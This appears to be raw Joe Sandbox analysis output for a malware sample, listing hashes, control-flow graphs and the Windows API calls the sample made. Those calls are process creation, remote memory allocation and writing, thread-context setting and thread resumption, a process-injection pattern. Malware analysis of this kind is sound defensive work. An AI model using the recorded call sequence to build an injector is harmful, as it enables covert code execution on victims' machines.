                                                            • Instruction ID: c650d7fea62acdea48e3e546eea02cd8fe62243d7757a6f6c2aa71dc02647300
                                                            • Opcode Fuzzy Hash: 55f93d321bf59cbd76211ad7581757931ee455c4c3dc1fc16b4a963e838a442a
                                                            • Instruction Fuzzy Hash: F5915DB1D0021ADFDB10DF68C841BDEBBB2FF48314F1485A9E849A7250DB759985CF92

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 742 763eecf-763ef65 744 763ef67-763ef71 742->744 745 763ef9e-763efbe 742->745 744->745 746 763ef73-763ef75 744->746 750 763efc0-763efca 745->750 751 763eff7-763f026 745->751 748 763ef77-763ef81 746->748 749 763ef98-763ef9b 746->749 752 763ef83 748->752 753 763ef85-763ef94 748->753 749->745 750->751 754 763efcc-763efce 750->754 761 763f028-763f032 751->761 762 763f05f-763f119 CreateProcessA 751->762 752->753 753->753 755 763ef96 753->755 756 763eff1-763eff4 754->756 757 763efd0-763efda 754->757 755->749 756->751 759 763efde-763efed 757->759 760 763efdc 757->760 759->759 763 763efef 759->763 760->759 761->762 764 763f034-763f036 761->764 773 763f122-763f1a8 762->773 774 763f11b-763f121 762->774 763->756 765 763f059-763f05c 764->765 766 763f038-763f042 764->766 765->762 768 763f046-763f055 766->768 769 763f044 766->769 768->768 770 763f057 768->770 769->768 770->765 784 763f1aa-763f1ae 773->784 785 763f1b8-763f1bc 773->785 774->773 784->785 786 763f1b0 784->786 787 763f1be-763f1c2 785->787 788 763f1cc-763f1d0 785->788 786->785 787->788 789 763f1c4 787->789 790 763f1d2-763f1d6 788->790 791 763f1e0-763f1e4 788->791 789->788 790->791 792 763f1d8 790->792 793 763f1f6-763f1fd 791->793 794 763f1e6-763f1ec 791->794 792->791 795 763f214 793->795 796 763f1ff-763f20e 793->796 794->793 798 763f215 795->798 796->795 798->798
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0763F106
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 03c45a5f75950e2c3eac862c0e3dd1e55951fbae8c9ebef9c33481ae14a5e1a0
                                                            • Instruction ID: 2354257cc41363efe53ced85c489e773e546b879f61decb8bbf7469f3380be04
                                                            • Opcode Fuzzy Hash: 03c45a5f75950e2c3eac862c0e3dd1e55951fbae8c9ebef9c33481ae14a5e1a0
                                                            • Instruction Fuzzy Hash: 88915DB1D0021ADFDB10CFA8C941BEDBBB2BF48314F1485A9E849A7250DB759985CF92

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 799 108b86a-108b87f 800 108b8ab-108b8af 799->800 801 108b881-108b88e call 108b27c 799->801 802 108b8b1-108b8bb 800->802 803 108b8c3-108b904 800->803 808 108b890 801->808 809 108b8a4 801->809 802->803 810 108b911-108b91f 803->810 811 108b906-108b90e 803->811 856 108b896 call 108bb08 808->856 857 108b896 call 108baf8 808->857 809->800 812 108b921-108b926 810->812 813 108b943-108b945 810->813 811->810 817 108b928-108b92f call 108b288 812->817 818 108b931 812->818 816 108b948-108b94f 813->816 814 108b89c-108b89e 814->809 815 108b9e0-108baa0 814->815 849 108baa8-108bad3 GetModuleHandleW 815->849 850 108baa2-108baa5 815->850 820 108b95c-108b963 816->820 821 108b951-108b959 816->821 819 108b933-108b941 817->819 818->819 819->816 823 108b970-108b979 call 108b298 820->823 824 108b965-108b96d 820->824 821->820 830 108b97b-108b983 823->830 831 108b986-108b98b 823->831 824->823 830->831 832 108b9a9-108b9ad 831->832 833 108b98d-108b994 831->833 854 108b9b0 call 108bde8 832->854 855 108b9b0 call 108bdc0 832->855 833->832 835 108b996-108b9a6 call 108b2a8 call 108b2b8 833->835 835->832 836 108b9b3-108b9b6 839 108b9b8-108b9d6 836->839 840 108b9d9-108b9df 836->840 839->840 851 108badc-108baf0 849->851 852 108bad5-108badb 849->852 850->849 852->851 854->836 855->836 856->814 857->814
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0108BAC6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1802663033.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_1080000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 880cd1df90a941968cb8bfc0319341b45384c7306b7329c228ebbf1db63f80a2
                                                            • Instruction ID: 0f5816c1f77dd3a382975415038e2ac9a6da77c834632bd9beec3326fff8bd35
                                                            • Opcode Fuzzy Hash: 880cd1df90a941968cb8bfc0319341b45384c7306b7329c228ebbf1db63f80a2
                                                            • Instruction Fuzzy Hash: AE813370A04B058FDB64EF29D44079ABBF1FF88300F148A6DD4CA9BA50DB75E949CB91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 967 763ec48-763ec96 969 763eca6-763ece5 WriteProcessMemory 967->969 970 763ec98-763eca4 967->970 972 763ece7-763eced 969->972 973 763ecee-763ed1e 969->973 970->969 972->973
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0763ECD8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: ff454f5188bee2d7996d9d5c0bf3f11e4b053bea422a40b001953b86b9dc0196
                                                            • Instruction ID: 0aced658aba62fdc6656a6a212d3653163deb50bf14ea43daf9f91c78e6d52ce
                                                            • Opcode Fuzzy Hash: ff454f5188bee2d7996d9d5c0bf3f11e4b053bea422a40b001953b86b9dc0196
                                                            • Instruction Fuzzy Hash: 112166B19003599FCB10CFA9C885BDEBBF5FF88310F10842AE919A7240C779A944CFA4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 977 763ec47-763ec96 979 763eca6-763ece5 WriteProcessMemory 977->979 980 763ec98-763eca4 977->980 982 763ece7-763eced 979->982 983 763ecee-763ed1e 979->983 980->979 982->983
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0763ECD8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 7a4578d6638f11bf1f3902d93db5b87be1d2cc64473c41a2e913e46e190e2354
                                                            • Instruction ID: 5bcc8747b6f54fb68122614980f8216ae31b23aa374d4a21aebda78f880c3b65
                                                            • Opcode Fuzzy Hash: 7a4578d6638f11bf1f3902d93db5b87be1d2cc64473c41a2e913e46e190e2354
                                                            • Instruction Fuzzy Hash: AC2125B59003599FCB10CFA9C985BEEBBF1FF48310F10882AE959A7250D7799944CFA4
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04FF1DEF
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 75b162161967c453c684dd606173f9102efaa1914273c3ee51fbc81888dfb350
                                                            • Instruction ID: 53466963b9dc63e4c3499499d0b2ac542536dcb59d7be156fd363bf1626e1148
                                                            • Opcode Fuzzy Hash: 75b162161967c453c684dd606173f9102efaa1914273c3ee51fbc81888dfb350
                                                            • Instruction Fuzzy Hash: 4D21E3B5900248EFDB10CFA9D984ADEBBF4EF48320F14841AE958A7310D378A945CFA5
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0763E6F6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 0139a8dcd074be218263e0b8d9eb4342a950ae3c460c306d212f1aad229bbf63
                                                            • Instruction ID: e16baf488c78764fb529d8109b12d553ea3440db4b2c1d89a3d765f6fcadb723
                                                            • Opcode Fuzzy Hash: 0139a8dcd074be218263e0b8d9eb4342a950ae3c460c306d212f1aad229bbf63
                                                            • Instruction Fuzzy Hash: D2216AB19002098FDB10DFA9C5857EEBBF1EF88324F14842AD459B7280C7789584CFA4
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0763E6F6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 7e0a8da76f22175e18bbccf95133c2368cbd86041869aafc2c968659063b5b87
                                                            • Instruction ID: db65d6ddcad8d60ca753bbe809e77cab0e25a63bd698fa42d30414ae8fbe7aec
                                                            • Opcode Fuzzy Hash: 7e0a8da76f22175e18bbccf95133c2368cbd86041869aafc2c968659063b5b87
                                                            • Instruction Fuzzy Hash: 522149B1D003098FDB10DFAAC4857EEBBF4EF88324F108429D459A7241C778A944CFA5
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0763EDB8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 3996ed6483b366b0b10ab47035e71d09633b96a3cdc194c305dfbd87b01c50c6
                                                            • Instruction ID: 601519a5594683d036c526415dfe204446459ea6a57103500713d1e638f0f306
                                                            • Opcode Fuzzy Hash: 3996ed6483b366b0b10ab47035e71d09633b96a3cdc194c305dfbd87b01c50c6
                                                            • Instruction Fuzzy Hash: CA2116B19002599FCB10DFAAC845AEEBBF5FF48310F108429E559A7250D7399544CBA5
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04FF1DEF
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: c2a4ff5d179118475d3e75bd9986e5c410f6066b9afda0df6b04848ae77dd744
                                                            • Instruction ID: 281e93e1560003a86262196cfade236323b4dd633e75a384ad4281952fcdc545
                                                            • Opcode Fuzzy Hash: c2a4ff5d179118475d3e75bd9986e5c410f6066b9afda0df6b04848ae77dd744
                                                            • Instruction Fuzzy Hash: 4221C4B5900258DFDB10CF9AD984ADEBBF8EF48310F14841AE954A7350D374A944CFA5
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0763EDB8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 8025ae6230c46b284f3f2ae35d1ce98496f8db8638a34340f00f5865d94a08a1
                                                            • Instruction ID: ebcb049227d12dc030a27a8fc3fe5831da28ef5b3dad03e326404974e9eaaa90
                                                            • Opcode Fuzzy Hash: 8025ae6230c46b284f3f2ae35d1ce98496f8db8638a34340f00f5865d94a08a1
                                                            • Instruction Fuzzy Hash: 6F2125B1D002599FCB10CFA9C985BEEBBF5FF48310F14882AE559A7250D7389544CBA4
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0763EBF6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: a1e7ac5d75e5cb4dfbd9b13caaa435fb91befae6b2811feef24637f551b6dd91
                                                            • Instruction ID: 4abfac12722ab2f496697081ef92844671e3262e9cc02b29c9640775e5405999
                                                            • Opcode Fuzzy Hash: a1e7ac5d75e5cb4dfbd9b13caaa435fb91befae6b2811feef24637f551b6dd91
                                                            • Instruction Fuzzy Hash: 341167B68002599FCF10DFA9C945BDEBBF5EF48320F20881AE529A7250C7359954CFA0
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0763EBF6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 22c59ca0d732b2a702988c6b51edf3d96c333f3ceed4d7e72a1fadb81b15cdf8
                                                            • Instruction ID: 618b108a2add48c7c2515972a3d0930adfb6a295d048e9858fa17f03c362934b
                                                            • Opcode Fuzzy Hash: 22c59ca0d732b2a702988c6b51edf3d96c333f3ceed4d7e72a1fadb81b15cdf8
                                                            • Instruction Fuzzy Hash: 381167B18002499FCB10DFAAC844BDEBFF5EF88320F108819E519A7250C735A944CFA4
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 881c9c285de2e3b5c38247f7c7cc7f43654b634ad430a454da36b920d66d6368
                                                            • Instruction ID: 0fb349b09ae2662af8af03ca59bb7c52bf3eb08508083c85415a905b64fe142a
                                                            • Opcode Fuzzy Hash: 881c9c285de2e3b5c38247f7c7cc7f43654b634ad430a454da36b920d66d6368
                                                            • Instruction Fuzzy Hash: 971128B5D003598FCB20DFAAC5497DEFBF4AF48324F24881AC459A7250D739A544CFA5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807209948.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7630000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 70d9584d0e56e1d567bf65c126d2cb7c142acc2caaaae1c5a3dce2f2ab1612e4
                                                            • Instruction ID: d65a43f2d9abbfb80d3566208d469c8da2a7159c8352c5e8ef7517435ecd9b86
                                                            • Opcode Fuzzy Hash: 70d9584d0e56e1d567bf65c126d2cb7c142acc2caaaae1c5a3dce2f2ab1612e4
                                                            • Instruction Fuzzy Hash: 761128B19002598BCB20DFAAC4457DEFBF4EB88324F248819D459A7250C775A544CFA5
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0108BAC6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1802663033.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_1080000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: d7337ade963076d7c3dc10e63e10612b7bc5e67f61eacc8d34df02400fc4c75f
                                                            • Instruction ID: 981a7051ff543d6b127b1cca6b0da02cec29066aa82fa59ed0b60ed5926fb174
                                                            • Opcode Fuzzy Hash: d7337ade963076d7c3dc10e63e10612b7bc5e67f61eacc8d34df02400fc4c75f
                                                            • Instruction Fuzzy Hash: 24110FB5C002498FDB10DF9AD444ADEFBF4EB88224F14846AD498A7610D379A545CFA5
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 04FF23B5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 9b17d8e67a1139c798c9417299ddffe14e56317d3ae2349c63e7023092607866
                                                            • Instruction ID: d56f8700935a289ef6e11baa814c8bc7ce295d8f65870103efb551eb98592539
                                                            • Opcode Fuzzy Hash: 9b17d8e67a1139c798c9417299ddffe14e56317d3ae2349c63e7023092607866
                                                            • Instruction Fuzzy Hash: F91145B59003488FDB20DF9AC848BDEFBF4EB48324F108459D518A7320D375A944CFA6
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 04FF23B5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1806001613.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_4ff0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 76c3f3d4e8ad5ef8f36f432a586903684bb2b3242d7020beca52960d03bd0168
                                                            • Instruction ID: d952e38b8b29133c4f433c0c7c468614e88ae0721ed45af65501372f4a8e0edd
                                                            • Opcode Fuzzy Hash: 76c3f3d4e8ad5ef8f36f432a586903684bb2b3242d7020beca52960d03bd0168
                                                            • Instruction Fuzzy Hash: AE1100B5C003488FDB20CF99D549BDEBBF4EF08324F24885AD558A7621D339A945CFA6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (
                                                            • API String ID: 0-3887548279
                                                            • Opcode ID: dd5d3712748d2ea15906ec5fd780de8c2a833794bc9751be8baacf0404e24870
                                                            • Instruction ID: affa722f432a98a74ff996a9c0eecd405fb7ad05bfe058a751aa75a465a1aa6a
                                                            • Opcode Fuzzy Hash: dd5d3712748d2ea15906ec5fd780de8c2a833794bc9751be8baacf0404e24870
                                                            • Instruction Fuzzy Hash: 7951D7B4919228CFEB64DF64D884BE9BBB9FB4A301F1491DAD05DA7242D7305AC5CF40
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6659b6937d9439aadf0137ec8add7a5916246b87f2106771a0c6ecf137d1eb15
                                                            • Instruction ID: a6e3a8468cc727d67aa2972040d0f4678bb120c35271dc14baed7969b1ab1fdf
                                                            • Opcode Fuzzy Hash: 6659b6937d9439aadf0137ec8add7a5916246b87f2106771a0c6ecf137d1eb15
                                                            • Instruction Fuzzy Hash: 43B1ACB4B012099FDB14DBA8D594BAEBBF6EF88700F2440A9E455DB3A1DB30DD01CB61
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83512023d42d17da40286e06a54ac4bba45c60346338a2f864722c30b919465b
                                                            • Instruction ID: fb118df91e0756b5ba8750f3e68d7fc3faadd7f5606bce325cfdd2fc823eb4d2
                                                            • Opcode Fuzzy Hash: 83512023d42d17da40286e06a54ac4bba45c60346338a2f864722c30b919465b
                                                            • Instruction Fuzzy Hash: 7C31F7B0D5421ACFDB60DF65C8406E8BBB5FF9A300F1066EBE419A2211EB705AC4CF40
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1801397952.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_b9d000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: acdb464f4238f3b6ba5e688a72876216674678318612951dfbc131af57f3a3f9
                                                            • Instruction ID: 1504abf276c4419df3a51c4b4b4899411b896eb4c8b3562e860996b6ce9b6a01
                                                            • Opcode Fuzzy Hash: acdb464f4238f3b6ba5e688a72876216674678318612951dfbc131af57f3a3f9
                                                            • Instruction Fuzzy Hash: B721F172504240EFCF059F14D9C4B26BFA6FB98314F24C6B9E9091B256C33AD816CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1801498529.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bad000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88547a39e7cbed97be40cc21c8dec8fc7749c9d8ea069810a7ee35980f89937d
                                                            • Instruction ID: c7b78ae4d88881361ac37c7e5901d1d0274fe7888660484e43619e7f529a8705
                                                            • Opcode Fuzzy Hash: 88547a39e7cbed97be40cc21c8dec8fc7749c9d8ea069810a7ee35980f89937d
                                                            • Instruction Fuzzy Hash: 83210471608200DFCB24DF24D9D4B26BFA5FB89314F20C5ADD84A4B696C33AD847CA61
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1801498529.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bad000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d2e556e09c932ff3b9e485684055dff259d3a80b0900ef3fcf3e07d6681e7d3
                                                            • Instruction ID: d3ff465fbf5152109a9b79cf8ee32a77219a9b66e7c63030a2c53d15fab7f0b1
                                                            • Opcode Fuzzy Hash: 0d2e556e09c932ff3b9e485684055dff259d3a80b0900ef3fcf3e07d6681e7d3
                                                            • Instruction Fuzzy Hash: 0F2104B1608204DFCF04DF24D9C0B2ABBE5FB85714F20C5ADE84A4B656C33AD846CA66
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1801498529.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bad000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4aeaf66f532c9dd658d0bdd3f4a5b42dd1881a95478d48418a486e0807ad04fa
                                                            • Instruction ID: ff28d2eb8ef45aa6df6d646875d646304d9c17d525bfa5dab9980833dce72614
                                                            • Opcode Fuzzy Hash: 4aeaf66f532c9dd658d0bdd3f4a5b42dd1881a95478d48418a486e0807ad04fa
                                                            • Instruction Fuzzy Hash: 1F2184755093808FDB16CF24D594715BFB1EB46314F28C5DAD8498F697C33AD80ACB62
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1fb84862151e71d152e0b06df2906283e5f73099ed72a1cb768eb8db7b9a190f
                                                            • Instruction ID: b44f775b74def1abf7088d7b052fd2ca48ab7406042fa4f178ba1482ca3c60ec
                                                            • Opcode Fuzzy Hash: 1fb84862151e71d152e0b06df2906283e5f73099ed72a1cb768eb8db7b9a190f
                                                            • Instruction Fuzzy Hash: E92129B4919218CFEB20DF54C994BECBBF9FB4A310F0491DAD459A7241C7319A86CF50
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1801397952.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_b9d000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                            • Instruction ID: 7676f3487731f966b6c3083500c25aba18a5fb95b8f9ce35f8ef3cf880c56c7b
                                                            • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                            • Instruction Fuzzy Hash: EA219D76504284DFDF06CF10D9C4B16BFB2FB98314F24C6A9D9491B256C33AD826CB91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea478bd413d2a7bdc47a5cdcc1a3eaf8b324704665ec1ba3ca62b6fb4a2f8b98
                                                            • Instruction ID: 1a7e8a82e6e23f490dba5f7cc4d98c556283ba8fa9dfd825e66b9927e6d91a88
                                                            • Opcode Fuzzy Hash: ea478bd413d2a7bdc47a5cdcc1a3eaf8b324704665ec1ba3ca62b6fb4a2f8b98
                                                            • Instruction Fuzzy Hash: D921F9B8918218CFDB64DF60C884BF8BBB5EB4A315F1491DA841DA7295C7349ACACF50
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1801498529.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bad000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                            • Instruction ID: 63cd5d26c2c74ac97a353690179db7765135fb8866b3d7dfed7c53f1323767bd
                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                            • Instruction Fuzzy Hash: CE11DD75508280CFCB01CF14D5C4B19BFB1FB85314F24C6AAD84A4B656C33AD80ACB62
                                                            Memory Dump Source
